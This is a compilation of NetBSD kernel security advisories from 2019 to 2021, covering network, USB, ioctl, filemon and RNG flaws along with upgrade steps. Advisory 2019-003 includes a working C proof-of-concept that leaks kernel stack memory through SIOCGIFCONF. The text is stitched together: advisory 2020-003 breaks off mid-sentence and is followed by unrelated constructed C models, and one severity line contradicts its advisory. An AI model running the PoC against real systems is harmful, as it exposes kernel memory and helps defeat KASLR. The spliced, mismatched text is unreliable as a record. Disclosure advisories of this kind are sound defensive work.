It is recommended that all users upgrade to a supported release.


Abstract
========

IP ID randomization was not enabled by default and the randomization
algorithms were not strong enough.


Technical Details
=================

1. IPv4 and IPv6 fragment ids were not randomly generated by default.
   Furthermore the randomization algorithms were not strong enough.

2. The TCP ISS random generation had an information leak.

3. The IPv6 flow label generation algorithm was not strong enough.


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The following revisions fix the issues:

        src/sys/netinet/in_var.h        1.99,1.102
        src/sys/netinet/ip6.h           1.30
        src/sys/netinet/ip_input.c      1.400
        src/sys/netinet/tcp_subr.c      1.285,1.286
        src/sys/netinet/tcp_timer.c     1.96
        src/sys/netinet6/ip6_id.c       1.20
        src/sys/netinet6/ip6_var.h      1.88

The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarise how to upgrade your
kernel.  In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/netinet sys/netinet6
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html


Thanks To
=========

Amit Klein for reporting these vulnerabilities and Taylor R. Campbell
for fixing them.


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2021-001.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2021, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
NetBSD Security Advisory 2020-003: USB network interface jumbo packets
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2020-003
                 =================================

Topic:          USB network interface jumbo packets

Version:        NetBSD-current:    affected prior to 2020-08-28
                NetBSD 9*:         affected
                NetBSD 8*:         affected

Severity:       Devices on LAN can corrupt kernel memory

Fixed:          NetBSD-current:    2020-08-28
                NetBSD-9 branch:   2020-08-28
                NetBSD-8 branch:   2020-08-28

Please note that NetBSD releases prior to 8.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Some USB network interface drivers are missing a bounds check, without
which data from the network may be copied past the end of an array
allocated in a kernel mbuf cluster.  This enables a network device on
the same LAN to corrupt kernel memory.

The affected USB network interfaces are:

- atu(4)
- axe(4)
- axen(4)
- otus(4)
- run(4)
- ure(4)


Technical Details
=================

Not all USB network interface drivers are affected: some don't handle
USB transfers larger than the kernel mbuf cluster size (MCLBYTES,
usually 2048).

* netbsd-8

The following drivers are vulnerable in netbsd-8:

- atu(4)  [fixed in netbsd-8 if_atu.c 1.55.8.4 2020-08-28]
- axe(4)  [fixed in netbsd-8 if_axe.c 1.82.6.5 2020-08-28]
- axen(4) [fixed in netbsd-8 if_axen.c 1.11.8.9 2020-08-28]
- otus(4) [fixed in netbsd-8 if_otus.c 1.31.2.3 2020-06-16]
- run(4)  [fixed in netbsd-8 if_run.c 1.22.2.3 2020-06-16]

The following drivers were audited and do not appear to be affected in
netbsd-8:

- athn(4)   - drops packets larger than MCLBYTES
- aue(4)    - transfers only up to AUE_BUFSZ=1536 bytes
- bwfm(4)   - transfers only up to BWFM_RXBUFSZ=1600 bytes
- cdce(4)   - transfers only up to CDCE_BUFSZ=1542 bytes
- cue(4)    - transfers only up to CUE_BUFSZ=1536 bytes
- kue(4)    - transfers only up to KUE_BUFSZ=1536 bytes
- rum(4)    - transfers only up to MCLBYTES
- smsc(4)   - drops packets larger than MCLBYTES
- udav(4)   - transfers only up to UDAV_BUFSZ=UDAV_MAX_MTU=1536 bytes
- upgt(4)   - transfers only up to MCLBYTES
- upl(4)    - transfers only up to UPL_BUFSZ=1024 bytes
- ural(4)   - transfers only up to MCLBYTES
- ure(4)    - no ure(4) in netbsd-8; only added in netbsd-9
- url(4)    - transfers only up to URL_BUFSIZ=1535 bytes
- urndis(4) - transfers only up to RNDIS_BUFSZ=1562 bytes
- urtw(4)   - transfers only up to MCLBYTES
- urtwn(4)  - drops packets larger than MCLBYTES
- zyd(4)    - transfers only up to MCLBYTES (plus header and trailer, not in mbuf)

* netbsd-9

The following drivers are vulnerable in netbsd-9:

- atu(4)  [fixed in netbsd-9 if_atu.c 1.65.2.1 2020-08-28]
- axe(4)  [fixed in netbsd-9 usbnet.c 1.25.2.5 2020-08-28]
- axen(4) [fixed in netbsd-9 usbnet.c 1.25.2.5 2020-08-28]
- otus(4) [fixed in netbsd-9 if_otus.c 1.38.2.1 2020-06-11]
- run(4)  [fixed in netbsd-9 if_run.c 1.32.4.1 2020-06-11]
- ure(4)  [fixed in netbsd-9 usbnet.c 1.25.2.5 2020-08-28]

The following drivers were audited and do not appear to be affected in
netbsd-9:

- athn(4)   - drops packets larger than MCLBYTES
- aue(4)    - transfers only up to AUE_BUFSZ=1536 bytes
- bwfm(4)   - transfers only up to BWFM_RXBUFSZ=1600 bytes
- cdce(4)   - transfers only up to CDCE_BUFSZ=1542 bytes
- cue(4)    - transfers only up to CUE_BUFSZ=1536 bytes
- kue(4)    - transfers only up to KUE_BUFSZ=1536 bytes
- mue(4)    - drops packets larger than MCLBYTES
- rum(4)    - transfers only up to MCLBYTES
- smsc(4)   - drops packets larger than MCLBYTES
- udav(4)   - transfers only up to UDAV_BUFSZ=UDAV_MAX_MTU=1536 bytes
- umb(4)    - uses m_devget rather than just MCLGET
- upgt(4)   - transfers only up to MCLBYTES
- upl(4)    - transfers only up to UPL_BUFSZ=1024 bytes
- ural(4)   - transfers only up to MCLBYTES
- url(4)    - transfers only up to URL_BUFSIZ=1535 bytes
- urndis(4) - transfers only up to RNDIS_BUFSZ=1562 bytes
- urtw(4)   - transfers only up to MCLBYTES
- urtwn(4)  - drops packets larger than MCLBYTES
- zyd(4)    - transfers only up to MCLBYTES (plus header and trailer, not in mbuf)

* HEAD

The following drivers are vulnerable in HEAD:

- atu(4)  [fixed in if_atu.c 1.73 2020-08-28]
- axe(4)  [fixed in usbnet.c 1.39 2020-08-28]
- axen(4) [fixed in usbnet.c 1.39 2020-08-28]
- otus(4) [fixed in if_otus.c 1.45 2020-06-11]
- run(4)  [fixed in if_run.c 1.41 2020-06-11]
- ure(4)  [fixed in usbnet.c 1.39 2020-08-28]

The following drivers were audited and do not appear to be affected in
HEAD:

- athn(4)   - drops packets larger than MCLBYTES
- aue(4)    - transfers only up to AUE_BUFSZ=1536 bytes
- bwfm(4)   - transfers only up to BWFM_RXBUFSZ=1600 bytes
- cdce(4)   - transfers only up to CDCE_BUFSZ=1542 bytes
- cue(4)    - transfers only up to CUE_BUFSZ=1536 bytes
- kue(4)    - transfers only up to
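The two safe behaviours the audit above credits (dropping frames larger than MCLBYTES, or never transferring more than one cluster holds) come down to one check on the device-reported length before the copy. This is an added userland model, not NetBSD driver code: `rx_cluster`, `usb_rx_frame`, `rx_deliver` and `rx_batch_guard_intact` are constructed names, and the guard word after the cluster stands in for whatever kernel memory would follow a real mbuf cluster.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MCLBYTES    2048          /* NetBSD's usual mbuf cluster size */
#define GUARD_MAGIC 0xDEADBEEFu

/* Constructed stand-in for an mbuf cluster, followed by a guard word so an
 * overrun becomes observable instead of silently clobbering a neighbour. */
struct rx_cluster {
	uint8_t  data[MCLBYTES];
	uint32_t guard;           /* must remain GUARD_MAGIC */
};

struct rx_stats { unsigned delivered, dropped_oversize; };

/* The length field arrives with the USB transfer, i.e. from the network
 * side, so it is untrusted input. */
struct usb_rx_frame { size_t len; const uint8_t *payload; };

/* Hardened receive path: refuse anything that does not fit one cluster.
 * Without the first 'if', the memcpy is exactly the missing bounds check. */
int rx_deliver(struct rx_cluster *cl, const struct usb_rx_frame *f,
	       struct rx_stats *st)
{
	if (f->len > sizeof(cl->data)) {
		st->dropped_oversize++;   /* "drops packets larger than MCLBYTES" */
		return -1;
	}
	memcpy(cl->data, f->payload, f->len);
	st->delivered++;
	return 0;
}

/* Push a constructed batch of frame lengths through the check.
 * Returns 1 if the guard word survived (no overrun), 0 otherwise. */
int rx_batch_guard_intact(const size_t *lens, size_t n, struct rx_stats *st)
{
	static uint8_t payload[9000];   /* larger than any frame constructed here */
	struct rx_cluster cl;
	size_t i;

	memset(payload, 0x41, sizeof(payload));
	memset(&cl, 0, sizeof(cl));
	cl.guard = GUARD_MAGIC;
	memset(st, 0, sizeof(*st));

	for (i = 0; i < n; i++) {
		struct usb_rx_frame f = { lens[i], payload };
		rx_deliver(&cl, &f, st);
	}
	return cl.guard == GUARD_MAGIC;
}

int main(void)
{
	/* Constructed lengths: a normal Ethernet frame, exactly one cluster,
	 * and a jumbo frame that must be dropped. */
	const size_t lens[] = { 1514, MCLBYTES, 9000 };
	struct rx_stats st;
	int ok = rx_batch_guard_intact(lens, 3, &st);

	printf("delivered=%u dropped=%u guard_intact=%d\n",
	       st.delivered, st.dropped_oversize, ok);
	return ok ? 0 : 1;
}
```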
NetBSD Security Advisory 2020-002: Specific ICMPv6 error message packet can crash the system
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2020-002
                 =================================

Topic:          Specific ICMPv6 error message packet can crash the system

Version:        NetBSD-current:    affected until January 23, 2020
                NetBSD 9.0:        not affected
                NetBSD 8.1:        affected
                NetBSD 7.x:        not affected

Severity:       Remote packets can crash the machine

Fixed:          NetBSD-current:    January 23, 2020
                NetBSD-9 branch:   January 23, 2020
                NetBSD-8 branch:   January 23, 2020
                NetBSD-7 branch:   not affected

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Due to a mistake in IP-IP tunnel packet processing, a malicious ICMPv6
error message packet whose payload is an IP-IP tunnel packet can cause
incorrect resource freeing leading to a system crash.

This is a remote DoS that affects all systems that have IPv6 enabled.


Technical Details
=================

NetBSD-7 is not affected since it does not use the resource that is
erroneously being freed.


Solutions and Workarounds
=========================

1. Filter out ICMPv6 'packet too big'-type packets using NPF.  Here's an
   example npf.conf file, assuming wm0 is the interface to be protected:

        $int_if = ifaddrs(wm0)

        group default {
                block in final on $int_if family inet6 proto ipv6-icmp icmp-type 2 all
                pass in on $int_if all
                pass out on $int_if all
        }

   Note that this workaround disables reception of packet-too-big icmp6
   messages, which are necessary for the host to perform pmtu discovery.
   If a remote host is on a network with a smaller MTU, IPv6
   communication may not work properly.

2. Update the kernel to a fixed version and reboot.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

        REL  = the release version you are using
        ARCH = your system's architecture

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version.

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarise how to upgrade your
kernel.  In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P src/sys/netinet/ip_encap.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/docs/guide/en/chap-kernel.html

The patches can be obtained from NetBSD-current with the following
command:

        cvs rdiff -u -r1.71 -r1.72 src/sys/netinet/ip_encap.c


Thanks To
=========

Yasuhiro Ohishi for pointing out the problem.
Kengo Nakahara for providing the fix.


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2020-002.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2020, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2020-002.txt.asc,v 1.3 2020/03/11 02:33:04 christos Exp $
NetBSD Security Advisory 2020-001: Missing permissions checks for network ioctls
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2020-001
                 =================================

Topic:          Missing permissions checks for network ioctls

Version:        NetBSD-current:    affected
                NetBSD 9.0_RC1:    affected
                NetBSD 8.1:        partially affected
                NetBSD 7.x:        partially affected

Severity:       Local users can crash the machine

Fixed:          NetBSD-current:    December 16, 2019
                NetBSD-9 branch:   December 17, 2019
                NetBSD-8 branch:   December 17, 2019
                NetBSD-7 branch:   December 17, 2019

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Three network interface related ioctls that should have been only
allowed for privileged users were not adequately protected.  An
unprivileged user can set network interface descriptions, get and set
diagnostic data from some atheros interfaces, and retrieve descriptor
information from umb (usb mobile network device).


Technical Details
=================

Specifically the following ioctls were missing permissions checks:

IOCTL         FUNCTION        IFACE  VERSION  HOW
------------  --------------  -----  -------  ---------------------------------
SIOCGATHDIAG  ath_ioctl       ath    *        get and set diagnostic info
SIOCSIFDESCR  ifioctl_common  *      9,CUR    set the interface description
SIOCGUMBINFO  umb_ioctl       umb    9,CUR    get descriptor info/potentially
                                              contains username/password


Solutions and Workarounds
=========================

Update the kernel to a fixed version and reboot.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

        REL  = the release version you are using
        ARCH = your system's architecture

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version.

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarise how to upgrade your
kernel.  In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P src/sys/dev/ic/ath.c
        # cvs update -d -P src/sys/dev/usb/if_umb.c
        # cvs update -d -P src/sys/net/if.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/docs/guide/en/chap-kernel.html

The patches can be obtained from NetBSD-current with the following
commands:

        cvs rdiff -u -r1.128 -r1.129 src/sys/dev/ic/ath.c
        cvs rdiff -u -r1.9 -r1.10 src/sys/dev/usb/if_umb.c
        cvs rdiff -u -r1.465 -r1.466 src/sys/net/if.c


Thanks To
=========

Ilja Van Sprundel for reporting this vulnerability.


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2020-001.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2020, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2020-001.txt.asc,v 1.1 2020/01/21 16:08:16 christos Exp $
NetBSD Security Advisory 2019-006: Denial of service and possible privilege escalation in filemon
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2019-006
                 =================================

Topic:          Denial of service and possible privilege escalation in filemon

Version:        NetBSD-current:    affected up to 9.99.17
                NetBSD 8.1:        affected
                NetBSD 7.x:        unaffected

Severity:       Local users can crash the machine

Fixed:          NetBSD-current:    October 28, 2019
                NetBSD-9 branch:   October 28, 2019
                NetBSD-8 branch:   October 28, 2019

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An unprivileged user can write filemon output to arbitrary files, or
crash the system.


Technical Details
=================

The filemon module is experimental and not suitable for general use.
Unfortunately it can be inadvertently auto-loaded when /dev/filemon is
opened, and /dev/filemon is accessible to any user.

There was a missing write check in the filemon module, thus permitting
any user to overwrite any file in the system.  While we are not
currently aware of an exploit, it is conceivable that one can overwrite
a configuration file parsed by a privileged daemon that does not abort
on syntax errors.

Additionally the way filemon does filesystem interception is racy and
can lead to random crashes if the system calls are in use while the
module is unloaded.


Solutions and Workarounds
=========================

Unloading and removing the filemon module, either manually:

        # modunload filemon
        # rm -rf /stand/*/*/modules/filemon/

Or by updating the machine to a newer build and running

        postinstall fix obsolete


Thanks To
=========

Ilja Van Sprundel for reporting this vulnerability.


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-006.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2019, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2019-006.txt.asc,v 1.1 2019/12/17 00:55:08 christos Exp $
NetBSD Security Advisory 2019-005: Sysctl RNG Key Erasure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2019-005
                 =================================

Topic:          Sysctl RNG Key Erasure

Version:        NetBSD-current:    affected prior to 2019-11-25
                NetBSD 8*:         affected
                NetBSD 7.2*:       affected
                NetBSD 7.1*:       affected

Severity:       Retroactive disclosure of cryptographic keys until reboot

Fixed:          NetBSD-current:    2019-11-25
                NetBSD-7 branch:   2019-11-25
                NetBSD-8 branch:   2019-11-25
                NetBSD-7 branch:   2019-11-25
                NetBSD-7-2 branch: 2019-11-25
                NetBSD-7-1 branch: 2019-11-25

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

The algorithm used by one of the kernel's cryptographic random number
generation interfaces, the kern.arandom sysctl, failed to erase past
states, and therefore failed to provide what is sometimes called
backtracking resistance or forward secrecy.  Thus, an adversary who
could disclose kernel memory could retroactively predict past outputs
of this random number generator.


Technical Details
=================

The sysctl node kern.arandom is designed to return uniform random bits
fit for use as cryptographic keys.  The libc arc4random(3) function
uses kern.arandom to seed userland pseudorandom number generators, and
various applications may use libc arc4random(3) to generate keys.

The arc4random(3) security model asserts that:

        An attacker who has seen the library's PRNG state in memory
        cannot predict past outputs.

However, owing to a mistake in the implementation of kern.arandom, an
attacker who has disclosed the kernel PRNG state used by kern.arandom
can predict past outputs of kern.arandom, in violation of the security
property we intended to guarantee.

The problem is limited to kern.arandom, and does not affect
/dev/random, /dev/urandom, or kern.urandom.


Solutions and Workarounds
=========================

Update the kernel to a fixed version and reboot.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nyftp.netbsd.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

        REL  = the release version you are using
        ARCH = your system's architecture

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version.

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarise how to upgrade your
kernel.  In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/kern/subr_cprng.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html


Thanks To
=========

Taylor `Riastradh' Campbell caused, found, and fixed the bug.


Revision History
================

        2019-11-26      Initial release


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-005.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2019, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2019-005.txt.asc,v 1.1 2019/11/26 18:35:15 christos Exp $
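The property the advisory above describes, as an added example that is not NetBSD's cprng code: two generators built on the same keyed mixer, one that keeps its key and only advances a counter (so a disclosed state lets an adversary recompute earlier outputs), and one that derives the output and a successor key from the current key and then overwrites that key before returning. The mixer `prf64` is a constructed stand-in for a real PRF and is not cryptographic; the adversary modelled is one who reads the current state and replays the generator's own update rule, which is the failure the advisory's "failed to erase past states" names.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed keyed mixer standing in for a real PRF (AES, a hash, ...).
 * NOT cryptographic; only the state handling around it is the point. */
static uint64_t prf64(uint64_t key, uint64_t msg)
{
	uint64_t x = key ^ (msg * 0x9E3779B97F4A7C15ull);
	x ^= x >> 30; x *= 0xBF58476D1CE4E5B9ull;
	x ^= x >> 27; x *= 0x94D049BB133111EBull;
	x ^= x >> 31;
	return x;
}

/* Design 1, no backtracking resistance: the key is never replaced, the
 * state is (key, counter).  Whoever reads it can step the counter back. */
struct ctr_rng { uint64_t key; uint64_t ctr; };

static uint64_t ctr_next(struct ctr_rng *r)
{
	return prf64(r->key, r->ctr++);
}

/* Design 2, key erasure: each call derives the output AND a successor key
 * from the current key, then overwrites the current key.  After the call
 * the state no longer contains what produced the output. */
struct fke_rng { uint64_t key; };

static uint64_t fke_next(struct fke_rng *r)
{
	uint64_t out  = prf64(r->key, 0);
	uint64_t next = prf64(r->key, 1);
	r->key = next;                 /* erase: the old key exists nowhere now */
	return out;
}

/* Adversary who captured the state right after a call and tries to
 * recompute the output that call returned. */
static uint64_t ctr_attack(const struct ctr_rng *leaked)
{
	return prf64(leaked->key, leaked->ctr - 1);   /* counter is reversible */
}

static uint64_t fke_attack(const struct fke_rng *leaked)
{
	/* Replaying the update rule on the leaked key yields the NEXT output,
	 * not the previous one; the key that produced that one is gone. */
	return prf64(leaked->key, 0);
}

/* Each returns 1 if the adversary recovers the last output, else 0. */
int ctr_design_leaks_past(uint64_t seed)
{
	struct ctr_rng r = { seed, 0 };
	uint64_t last = 0;
	for (int i = 0; i < 4; i++)
		last = ctr_next(&r);
	return ctr_attack(&r) == last;
}

int fke_design_leaks_past(uint64_t seed)
{
	struct fke_rng r = { seed };
	uint64_t last = 0;
	for (int i = 0; i < 4; i++)
		last = fke_next(&r);
	return fke_attack(&r) == last;
}

int main(void)
{
	printf("counter design:     past output recoverable = %d\n",
	       ctr_design_leaks_past(0x1234));
	printf("key-erasure design: past output recoverable = %d\n",
	       fke_design_leaks_past(0x1234));
	return 0;
}
```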
NetBSD Security Advisory 2019-004: IPv6 neighbor cache leak on expiration
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2019-004
                 =================================

Topic:          IPv6 neighbor cache leak on expiration

Version:        NetBSD-current:    affected up to 8.99.51
                NetBSD 8.1:        affected
                NetBSD 7.2:        not affected
                NetBSD 7.1.2:      not affected
                NetBSD 7.0.2:      not affected

Severity:       Remote DoS attack can cause the kernel to run out of memory

Fixed:          NetBSD-current:    July 26, 2019
                NetBSD-9 branch:   not affected
                NetBSD-8 branch:   July 26, 2019
                NetBSD-7 branch:   not affected
                NetBSD-7-2 branch: not affected
                NetBSD-7-1 branch: not affected
                NetBSD-7-0 branch: not affected

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An unprivileged user can cause kernel resource exhaustion by creating
many IPv6 neighbor entries, because the GC mechanism will not delete
them due to a reference counting bug.  An explicit cache flush will
delete them, recovering the used memory.


Technical Details
=================

The garbage collection (GC) mechanism of IPv6 neighbor caches has a bug
in that it doesn't free expired neighbor caches (llentry) because of a
missing refcount decrement.  The leak occurs when:

1) giving up a neighbor discovery for a cache,
2) giving up a reachability confirmation for a cache,
3) a cache expires, or
4) a forced GC runs.

A forced GC destroys cache entries that have overflowed its limit
(ip6.neighborgcthresh).  The third and fourth cases can be triggered on
receiving NS packets, so it can be used as a DoS attack that can
originate from machines on the same link.


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarise how to upgrade your
kernel.  In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/netinet6/nd6.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        https://www.NetBSD.org/docs/guide/en/chap-kernel.html


Thanks To
=========

Internet Initiative Japan Inc. for finding and fixing the vulnerability.


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-004.txt.asc

Information about NetBSD and NetBSD security can be found at
        https://www.NetBSD.org/
        https://www.NetBSD.org/Security/


Copyright 2019, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2019-004.txt.asc,v 1.1 2019/08/08 10:18:29 christos Exp $
NetBSD Security Advisory 2019-003: Unprivileged user kernel stack disclosure in SIOCGIFCONF
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2019-003
                 =================================

Topic:          Unprivileged user kernel stack disclosure in SIOCGIFCONF

Version:        NetBSD-current:    affected prior to April 15, 2019
                NetBSD 8.0:        affected
                NetBSD 7.2:        affected
                NetBSD 7.1.2:      affected
                NetBSD 7.0.2:      affected

Severity:       Local user may cause the kernel to run out of memory

Fixed:          NetBSD-current:    April 15, 2019
                NetBSD-8 branch:   April 19, 2019
                NetBSD-7 branch:   April 19, 2019
                NetBSD-7-2 branch: April 19, 2019
                NetBSD-7-1 branch: April 19, 2019
                NetBSD-7-0 branch: April 19, 2019

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An unprivileged user can leak a huge amount of kernel stack by issuing
the 'SIOCGIFCONF' ioctl command.


Technical Details
=================

Kernel stack can be leaked to an unprivileged user at [1], because
'ifr' is uninitialized and only 'sa->sa_len' bytes are copied to
'ifr.ifr_space'.  The size of 'struct ifreq ifr' is 0x90 bytes and
'sa->sa_len' is usually 0x11 bytes.  Hence, up to 0x7f bytes can be
leaked.  This can expose sensitive information, pointers to bypass
KASLR, stack canaries which can be used to exploit stack buffer
overflows, etc.

Proof-Of-Concept (the header names below were lost in extraction and
are restored as the standard ones this program needs):

        #include <stdio.h>
        #include <string.h>
        #include <sys/ioctl.h>
        #include <sys/socket.h>
        #include <net/if.h>

        /* Sample output:
        77 6D 30 00 00 00 00 00 00 00 00 00 00 00 00 00
        11 12 01 00 06 03 06 00 77 6D 30 08 00 27 56 80
        E1 EF CB 08 81 FE FF FF 00 10 00 00 00 00 00 00
        20 AE 1C 68 00 80 FF FF 00 00 00 00 00 00 00 00
        20 CC 92 1E 01 00 00 00 80 F7 4C 1B 81 FE FF FF
        40 AE 1C 68 03 00 00 00 80 F4 4C 1B 81 FE FF FF
        80 F4 4C 1B 81 FE FF FF 80 F7 4C 1B 81 FE FF FF
        80 F4 4C 1B 81 FE FF FF 10 57 3E 1B 81 FE FF FF
        00 52 C4 1E 81 FE FF FF 00 00 00 00 00 00 00 00
        */

        /* Print the buffer as hex, 16 bytes per line. */
        void hexDump(const void *data, size_t size)
        {
                size_t i;
                for (i = 0; i < size; i++) {
                        printf("%02hhX%c", ((char *)data)[i],
                            (i + 1) % 16 ? ' ' : '\n');
                }
                printf("\n");
        }

        int main(int argc, char *argv[])
        {
                struct ifconf conf;
                struct ifreq req[1];
                int fd;

                /* Zero the userland buffer so anything non-zero after the
                 * ioctl came from the kernel. */
                memset(req, 0, sizeof(req));
                fd = socket(AF_INET, SOCK_DGRAM, 0);
                conf.ifc_len = sizeof(req);
                conf.ifc_buf = (char *)req;
                ioctl(fd, SIOCGIFCONF, &conf);
                hexDump(req, sizeof(req));
                return 0;
        }

[1] https://github.com/NetBSD/src/blob/trunk/sys/net/if.c#L3378


Solutions and Workarounds
=========================

Update the kernel to a fixed version and reboot.

To apply a fixed version from a releng build, fetch a fitting
kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries:

        cd /var/tmp
        ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz
        cd /
        tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

        REL  = the release version you are using
        ARCH = your system's architecture

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version.

For all NetBSD versions, you need to obtain fixed kernel sources,
